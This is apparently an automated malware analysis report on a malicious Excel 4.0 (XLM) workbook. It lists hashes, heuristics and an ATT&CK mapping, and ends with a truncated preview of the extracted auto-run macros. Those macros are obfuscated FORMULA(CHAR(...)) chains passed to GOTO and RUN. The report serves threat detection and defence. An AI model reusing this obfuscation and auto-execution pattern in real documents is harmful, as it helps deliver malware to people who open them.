Office (OLE) malware analysis — malicious · d6a57677af75db7f

MALICIOUS

Office (OLE)

231.5 KB Created: 2020-05-15 08:28:45 Authoring application: Microsoft Excel First seen: 2020-09-07

MD5: efae5f4c9d1a53a85341cc34edf71e82 SHA-1: a157d76d4c15f44d175a0d6733da0ad398fd7b70 SHA-256: d6a57677af75db7fa0e48b7d7cfa34c379cef95725d543a7384101abaa169422

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The critical heuristics indicate the presence of an obfuscated Excel 4.0 Auto_Open macro. This macro is designed to execute automatically when the workbook is opened, likely to download and run a secondary payload. The obfuscation and auto-execution chain suggest a malicious intent to compromise the user's system.

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 127842 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	127842 bytes
SHA-256: `09353415bec3606b649a658e873ae4bc2e51ff2923f6d8530885301e4d78f9c5`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!EE27663 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,GF1,"",-385.00000000000000000000 ' Sheet,JB13,"",-1.55555555555555558023 ' Sheet,IS15,"",-1.45742574257425738793 ' Sheet,DN20,"",-230.00000000000000000000 ' Sheet,CI144,"",-1.37777777777777776791 ' Sheet,GB176,"",107.50000000000000000000 ' Sheet,G204,"",0.23322884012539185639 ' Sheet,EQ255,"",329.75000000000000000000 ' Sheet,J274,"",164.00000000000000000000 ' Sheet,IB360,"",7.81862745098039191305 ' Sheet,I379,"",-5.29850746268656713767 ' Sheet,IU384,"",-1.42857142857142860315 ' Sheet,CY404,"",0.62150155991041433623 ' Sheet,HZ481,"",40.60273972602739434024 ' Sheet,CF504,"",2.20408263265306114675 ' Sheet,X517,"",231.00000000000000000000 ' Sheet,JH614,"",-9.85294117647058875775 ' Sheet,CK636,"",-417.00000000000000000000 ' Sheet,EZ651,"FORMULA(CHAR(E38801C7125)&CHAR(JM31677/GZ63532)&CHAR(JL44866DO41761)&CHAR(HY43483DI63643)&CHAR(N64065+IK61902)&CHAR(EF55175-BX28324)&CHAR(EF55175IR49454)&CHAR(E243FJ27915)&CHAR(N64065-JD15644)&CHAR(JL44866-GA40133)&CHAR(EF55175-EB13687)&CHAR(IS51553+GU52128)&CHAR(E38801-FN55467)&CHAR(JL44866+CV15662)&CHAR(HY43483-EP42353)&CHAR(N64065+II13430)&CHAR(E38801-JA60994)&CHAR(JL44866-M2672)&CHAR(E38801GS1525)&CHAR(E38801-HE41650)&CHAR(EF55175G862)&CHAR(EF55175/HM17591)&CHAR(JL44866BM30207)&CHAR(N64065FT21226)&CHAR(IS51553-FB47522)&CHAR(DZ16737+HQ25064)&CHAR(HY43483I379)&CHAR(HY43483/GR34247)&CHAR(IS51553-BQ51763)&CHAR(E243/HO15194)&CHAR(HY43483-CB65478)&CHAR(JM31677/CF13903)&CHAR(DZ39501-DS17059)&CHAR(EF55175+HH17195)&CHAR(EF55175-FY15766)&CHAR(E243-DC23316)&CHAR(DZ16737GH57128)&CHAR(JL44866/GE25332)&CHAR(IS51553EV45905)&CHAR(E243/ES3564)&CHAR(DZ16737CG36573)&CHAR(E243/DE10320)&CHAR(E243/FA52566)&CHAR(DZ39501/BF21678)&CHAR(E38801/HH24197)&CHAR(DZ39501-CT24928)&CHAR(HY43483/EG23540),EZ652)","" ' Sheet,EZ653,GOTO(BR15610),"" ' Sheet,BS712,"",-0.32258064516129031363 ' Sheet,CS722,"FORMULA(CHAR(IS51553-H9849)&CHAR(DZ39501+GH20551)&CHAR(N64065/IA8456)&CHAR(IS51553/GS40821)&CHAR(E38801+O33775)&CHAR(E243-Q27392)&CHAR(JM31677BH55261)&CHAR(E243/JC51699)&CHAR(EF55175DT35795)&CHAR(E243+CP24201)&CHAR(N64065/GR56859)&CHAR(HY43483-JH53132)&CHAR(DZ39501+FI59173)&CHAR(EF55175/HY33316)&CHAR(DZ39501-GK31861)&CHAR(IS51553/EO25715)&CHAR(E38801GG58311)&CHAR(HY43483+CY54544)&CHAR(N64065-DO20301)&CHAR(N64065+HN37932)&CHAR(DZ39501+HL50218)&CHAR(DZ16737-HK36248)&CHAR(HY43483/GX27182)&CHAR(N64065+FB11373)&CHAR(DZ16737-DH3759)&CHAR(E243CZ11345)&CHAR(DZ39501+BN1084)&CHAR(JL44866-ES61624)&CHAR(IS51553J2442)&CHAR(E243-EX57205)&CHAR(DZ16737+DE7742)&CHAR(EF55175-HH34037)&CHAR(HY43483JD42785)&CHAR(JM31677-JP45177)&CHAR(EF55175-HA22638)&CHAR(N64065-HP36735)&CHAR(JL44866/BI57590)&CHAR(HY43483-FN54191)&CHAR(IS51553-IC22447)&CHAR(DZ39501/FB60715)&CHAR(EF55175+FI41020)&CHAR(DZ39501O34259)&CHAR(N64065/FH48928)&CHAR(DZ16737/FC17577)&CHAR(E243/DF24623)&CHAR(N64065/FV10138)&CHAR(EF55175ER33281)&CHAR(DZ39501+JT27169)&CHAR(E243-CW34528)&CHAR(EF55175BT10603)&CHAR(JL44866+HD50523)&CHAR(E38801Q11712)&CHAR(E38801/IB36566)&CHAR(IS51553/HZ60932)&CHAR(DZ39501+FZ24367)&CHAR(IS51553+EL45143)&CHAR(DZ39501-BV28659)&CHAR(DZ39501EC33886)&CHAR(HY43483CB30119)&CHAR(DZ16737JT54992)&CHAR(EF55175+FT28115)&CHAR(E243+EW44343)&CHAR(EF55175+BY62418)&CHAR(DZ39501-FW48518)&CHAR(EF55175/FR6700)&CHAR(IS51553K1524)&CHAR(E243IF49009)&CHAR(JM31677HC34505)&CHAR(JL44866CM44898)&CHAR(E243+HB24765)&CHAR(JM31677/HB58196)&CHAR(JM31677-IP15010)&CHAR(IS51553/IB7433)&CHAR(EF55175*JN16656)&CHAR(IS51553+EM38738)&CHAR(E38801-DS55085)&CHAR(E38801-BP11050)&CHAR(HY43483/JB10346)&CHAR(JL44866-DQ56382),CS723)","" ' Sheet,CS724,RUN(EA7329),"" ' Shee ... (truncated)

SHA-256: 09353415bec3606b649a658e873ae4bc2e51ff2923f6d8530885301e4d78f9c5

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!EE27663 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,GF1,"",-385.00000000000000000000
'  Sheet,JB13,"",-1.55555555555555558023
'  Sheet,IS15,"",-1.45742574257425738793
'  Sheet,DN20,"",-230.00000000000000000000
'  Sheet,CI144,"",-1.37777777777777776791
'  Sheet,GB176,"",107.50000000000000000000
'  Sheet,G204,"",0.23322884012539185639
'  Sheet,EQ255,"",329.75000000000000000000
'  Sheet,J274,"",164.00000000000000000000
'  Sheet,IB360,"",7.81862745098039191305
'  Sheet,I379,"",-5.29850746268656713767
'  Sheet,IU384,"",-1.42857142857142860315
'  Sheet,CY404,"",0.62150155991041433623
'  Sheet,HZ481,"",40.60273972602739434024
'  Sheet,CF504,"",2.20408263265306114675
'  Sheet,X517,"",231.00000000000000000000
'  Sheet,JH614,"",-9.85294117647058875775
'  Sheet,CK636,"",-417.00000000000000000000
'  Sheet,EZ651,"FORMULA(CHAR(E38801*C7125)&CHAR(JM31677/GZ63532)&CHAR(JL44866*DO41761)&CHAR(HY43483*DI63643)&CHAR(N64065+IK61902)&CHAR(EF55175-BX28324)&CHAR(EF55175*IR49454)&CHAR(E243*FJ27915)&CHAR(N64065-JD15644)&CHAR(JL44866-GA40133)&CHAR(EF55175-EB13687)&CHAR(IS51553+GU52128)&CHAR(E38801-FN55467)&CHAR(JL44866+CV15662)&CHAR(HY43483-EP42353)&CHAR(N64065+II13430)&CHAR(E38801-JA60994)&CHAR(JL44866-M2672)&CHAR(E38801*GS1525)&CHAR(E38801-HE41650)&CHAR(EF55175*G862)&CHAR(EF55175/HM17591)&CHAR(JL44866*BM30207)&CHAR(N64065*FT21226)&CHAR(IS51553-FB47522)&CHAR(DZ16737+HQ25064)&CHAR(HY43483*I379)&CHAR(HY43483/GR34247)&CHAR(IS51553-BQ51763)&CHAR(E243/HO15194)&CHAR(HY43483-CB65478)&CHAR(JM31677/CF13903)&CHAR(DZ39501-DS17059)&CHAR(EF55175+HH17195)&CHAR(EF55175-FY15766)&CHAR(E243-DC23316)&CHAR(DZ16737*GH57128)&CHAR(JL44866/GE25332)&CHAR(IS51553*EV45905)&CHAR(E243/ES3564)&CHAR(DZ16737*CG36573)&CHAR(E243/DE10320)&CHAR(E243/FA52566)&CHAR(DZ39501/BF21678)&CHAR(E38801/HH24197)&CHAR(DZ39501-CT24928)&CHAR(HY43483/EG23540),EZ652)",""
'  Sheet,EZ653,GOTO(BR15610),""
'  Sheet,BS712,"",-0.32258064516129031363
'  Sheet,CS722,"FORMULA(CHAR(IS51553-H9849)&CHAR(DZ39501+GH20551)&CHAR(N64065/IA8456)&CHAR(IS51553/GS40821)&CHAR(E38801+O33775)&CHAR(E243-Q27392)&CHAR(JM31677*BH55261)&CHAR(E243/JC51699)&CHAR(EF55175*DT35795)&CHAR(E243+CP24201)&CHAR(N64065/GR56859)&CHAR(HY43483-JH53132)&CHAR(DZ39501+FI59173)&CHAR(EF55175/HY33316)&CHAR(DZ39501-GK31861)&CHAR(IS51553/EO25715)&CHAR(E38801*GG58311)&CHAR(HY43483+CY54544)&CHAR(N64065-DO20301)&CHAR(N64065+HN37932)&CHAR(DZ39501+HL50218)&CHAR(DZ16737-HK36248)&CHAR(HY43483/GX27182)&CHAR(N64065+FB11373)&CHAR(DZ16737-DH3759)&CHAR(E243*CZ11345)&CHAR(DZ39501+BN1084)&CHAR(JL44866-ES61624)&CHAR(IS51553*J2442)&CHAR(E243-EX57205)&CHAR(DZ16737+DE7742)&CHAR(EF55175-HH34037)&CHAR(HY43483*JD42785)&CHAR(JM31677-JP45177)&CHAR(EF55175-HA22638)&CHAR(N64065-HP36735)&CHAR(JL44866/BI57590)&CHAR(HY43483-FN54191)&CHAR(IS51553-IC22447)&CHAR(DZ39501/FB60715)&CHAR(EF55175+FI41020)&CHAR(DZ39501*O34259)&CHAR(N64065/FH48928)&CHAR(DZ16737/FC17577)&CHAR(E243/DF24623)&CHAR(N64065/FV10138)&CHAR(EF55175*ER33281)&CHAR(DZ39501+JT27169)&CHAR(E243-CW34528)&CHAR(EF55175*BT10603)&CHAR(JL44866+HD50523)&CHAR(E38801*Q11712)&CHAR(E38801/IB36566)&CHAR(IS51553/HZ60932)&CHAR(DZ39501+FZ24367)&CHAR(IS51553+EL45143)&CHAR(DZ39501-BV28659)&CHAR(DZ39501*EC33886)&CHAR(HY43483*CB30119)&CHAR(DZ16737*JT54992)&CHAR(EF55175+FT28115)&CHAR(E243+EW44343)&CHAR(EF55175+BY62418)&CHAR(DZ39501-FW48518)&CHAR(EF55175/FR6700)&CHAR(IS51553*K1524)&CHAR(E243*IF49009)&CHAR(JM31677*HC34505)&CHAR(JL44866*CM44898)&CHAR(E243+HB24765)&CHAR(JM31677/HB58196)&CHAR(JM31677-IP15010)&CHAR(IS51553/IB7433)&CHAR(EF55175*JN16656)&CHAR(IS51553+EM38738)&CHAR(E38801-DS55085)&CHAR(E38801-BP11050)&CHAR(HY43483/JB10346)&CHAR(JL44866-DQ56382),CS723)",""
'  Sheet,CS724,RUN(EA7329),""
'  Shee
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.